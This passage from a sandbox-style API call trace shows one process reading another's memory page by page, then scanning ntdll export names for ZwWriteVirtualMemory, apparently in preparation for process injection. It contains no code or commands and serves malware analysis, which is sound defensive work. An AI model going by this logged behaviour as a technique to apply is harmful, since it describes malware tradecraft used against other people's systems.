NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b85000, Buffer=0x7ffb, BufferSize=0xb15000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.254] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b86000, Buffer=0x7ffb, BufferSize=0xb16000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.254] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b87000, Buffer=0x7ffb, BufferSize=0xb17000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.254] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b88000, Buffer=0x7ffb, BufferSize=0xb18000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.254] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b89000, Buffer=0x7ffb, BufferSize=0xb19000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.255] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8a000, Buffer=0x7ffb, BufferSize=0xb1a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.255] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8b000, Buffer=0x7ffb, BufferSize=0xb1b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.255] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8c000, Buffer=0x7ffb, BufferSize=0xb1c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.255] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8d000, Buffer=0x7ffb, BufferSize=0xb1d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.255] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8e000, Buffer=0x7ffb, BufferSize=0xb1e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.256] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8f000, Buffer=0x7ffb, BufferSize=0xb1f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.256] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b90000, Buffer=0x7ffb, BufferSize=0xb20000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.256] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b91000, Buffer=0x7ffb, BufferSize=0xb21000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.256] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b92000, Buffer=0x7ffb, BufferSize=0xb22000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.256] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b93000, Buffer=0x7ffb, BufferSize=0xb23000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.257] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b94000, Buffer=0x7ffb, BufferSize=0xb24000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.257] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b95000, Buffer=0x7ffb, BufferSize=0xb25000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.257] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b96000, Buffer=0x7ffb, BufferSize=0xb26000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.257] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b97000, Buffer=0x7ffb, BufferSize=0xb27000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.257] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b98000, Buffer=0x7ffb, BufferSize=0xb28000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.258] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b99000, Buffer=0x7ffb, BufferSize=0xb29000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.258] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9a000, Buffer=0x7ffb, BufferSize=0xb2a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.258] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9b000, Buffer=0x7ffb, BufferSize=0xb2b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.259] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9c000, Buffer=0x7ffb, BufferSize=0xb2c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.259] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9d000, Buffer=0x7ffb, BufferSize=0xb2d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.259] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9e000, Buffer=0x7ffb, BufferSize=0xb2e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.259] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9f000, Buffer=0x7ffb, BufferSize=0xb2f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.259] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba0000, Buffer=0x7ffb, BufferSize=0xb30000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.259] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba1000, Buffer=0x7ffb, BufferSize=0xb31000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.260] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba2000, Buffer=0x7ffb, BufferSize=0xb32000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.260] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba3000, Buffer=0x7ffb, BufferSize=0xb33000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.260] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba4000, Buffer=0x7ffb, BufferSize=0xb34000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.261] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba5000, Buffer=0x7ffb, BufferSize=0xb35000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.261] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba6000, Buffer=0x7ffb, BufferSize=0xb36000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.261] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba7000, Buffer=0x7ffb, BufferSize=0xb37000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.261] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba8000, Buffer=0x7ffb, BufferSize=0xb38000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.261] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba9000, Buffer=0x7ffb, BufferSize=0xb39000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.262] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28baa000, Buffer=0x7ffb, BufferSize=0xb3a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.262] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bab000, Buffer=0x7ffb, BufferSize=0xb3b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.262] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bac000, Buffer=0x7ffb, BufferSize=0xb3c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.262] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bad000, Buffer=0x7ffb, BufferSize=0xb3d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.305] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bae000, Buffer=0x7ffb, BufferSize=0xb3e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.305] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28baf000, Buffer=0x7ffb, BufferSize=0xb3f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.305] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb0000, Buffer=0x7ffb, BufferSize=0xb40000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.305] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb1000, Buffer=0x7ffb, BufferSize=0xb41000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.306] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb2000, Buffer=0x7ffb, BufferSize=0xb42000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.306] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb3000, Buffer=0x7ffb, BufferSize=0xb43000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.306] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb4000, Buffer=0x7ffb, BufferSize=0xb44000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.306] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb5000, Buffer=0x7ffb, BufferSize=0xb45000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.306] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb6000, Buffer=0x7ffb, BufferSize=0xb46000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.307] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb7000, Buffer=0x7ffb, BufferSize=0xb47000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.307] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb8000, Buffer=0x7ffb, BufferSize=0xb48000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.307] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb9000, Buffer=0x7ffb, BufferSize=0xb49000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.307] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bba000, Buffer=0x7ffb, BufferSize=0xb4a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.307] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbb000, Buffer=0x7ffb, BufferSize=0xb4b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.308] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbc000, Buffer=0x7ffb, BufferSize=0xb4c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.308] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbd000, Buffer=0x7ffb, BufferSize=0xb4d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.308] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbe000, Buffer=0x7ffb, BufferSize=0xb4e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.308] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbf000, Buffer=0x7ffb, BufferSize=0xb4f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.308] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc0000, Buffer=0x7ffb, BufferSize=0xb50000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.309] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc1000, Buffer=0x7ffb, BufferSize=0xb51000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.309] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc2000, Buffer=0x7ffb, BufferSize=0xb52000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.309] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc3000, Buffer=0x7ffb, BufferSize=0xb53000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.309] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc4000, Buffer=0x7ffb, BufferSize=0xb54000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.310] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc5000, Buffer=0x7ffb, BufferSize=0xb55000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.310] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc6000, Buffer=0x7ffb, BufferSize=0xb56000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.310] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc7000, Buffer=0x7ffb, BufferSize=0xb57000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.310] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc8000, Buffer=0x7ffb, BufferSize=0xb58000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.310] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc9000, Buffer=0x7ffb, BufferSize=0xb59000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.311] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bca000, Buffer=0x7ffb, BufferSize=0xb5a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.311] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcb000, Buffer=0x7ffb, BufferSize=0xb5b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.311] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcc000, Buffer=0x7ffb, BufferSize=0xb5c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.312] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcd000, Buffer=0x7ffb, BufferSize=0xb5d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.312] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bce000, Buffer=0x7ffb, BufferSize=0xb5e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.312] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcf000, Buffer=0x7ffb, BufferSize=0xb5f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.312] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd0000, Buffer=0x7ffb, BufferSize=0xb60000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.313] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd1000, Buffer=0x7ffb, BufferSize=0xb61000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.313] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd2000, Buffer=0x7ffb, BufferSize=0xb62000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.313] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd3000, Buffer=0x7ffb, BufferSize=0xb63000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.313] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd4000, Buffer=0x7ffb, BufferSize=0xb64000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.314] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd5000, Buffer=0x7ffb, BufferSize=0xb65000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.314] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd6000, Buffer=0x7ffb, BufferSize=0xb66000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.314] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd7000, Buffer=0x7ffb, BufferSize=0xb67000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.314] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd8000, Buffer=0x7ffb, BufferSize=0xb68000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.314] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd9000, Buffer=0x7ffb, BufferSize=0xb69000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.315] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bda000, Buffer=0x7ffb, BufferSize=0xb6a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.315] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdb000, Buffer=0x7ffb, BufferSize=0xb6b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.315] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdc000, Buffer=0x7ffb, BufferSize=0xb6c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.315] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdd000, Buffer=0x7ffb, BufferSize=0xb6d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.315] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bde000, Buffer=0x7ffb, BufferSize=0xb6e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.316] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdf000, Buffer=0x7ffb, BufferSize=0xb6f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.316] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be0000, Buffer=0x7ffb, BufferSize=0xb70000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.316] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be1000, Buffer=0x7ffb, BufferSize=0xb71000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.316] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be2000, Buffer=0x7ffb, BufferSize=0xb72000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.317] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be3000, Buffer=0x7ffb, BufferSize=0xb73000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.317] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be4000, Buffer=0x7ffb, BufferSize=0xb74000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.317] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be5000, Buffer=0x7ffb, BufferSize=0xb75000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.317] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be6000, Buffer=0x7ffb, BufferSize=0xb76000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.318] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be7000, Buffer=0x7ffb, BufferSize=0xb77000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.318] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be8000, Buffer=0x7ffb, BufferSize=0xb78000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.318] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be9000, Buffer=0x7ffb, BufferSize=0xb79000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.319] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bea000, Buffer=0x7ffb, BufferSize=0xb7a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.319] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28beb000, Buffer=0x7ffb, BufferSize=0xb7b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.319] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bec000, Buffer=0x7ffb, BufferSize=0xb7c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0145.408] lstrcmpA (lpString1="A_SHAFinal", lpString2="ZwWriteVirtualMemory") returned -1 [0145.408] lstrcmpA (lpString1="A_SHAInit", lpString2="ZwWriteVirtualMemory") returned -1 [0145.408] lstrcmpA (lpString1="A_SHAUpdate", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ZwWriteVirtualMemory") returned -1 [0145.409] lstrcmpA (lpString1="CsrCaptureMessageBuffer", 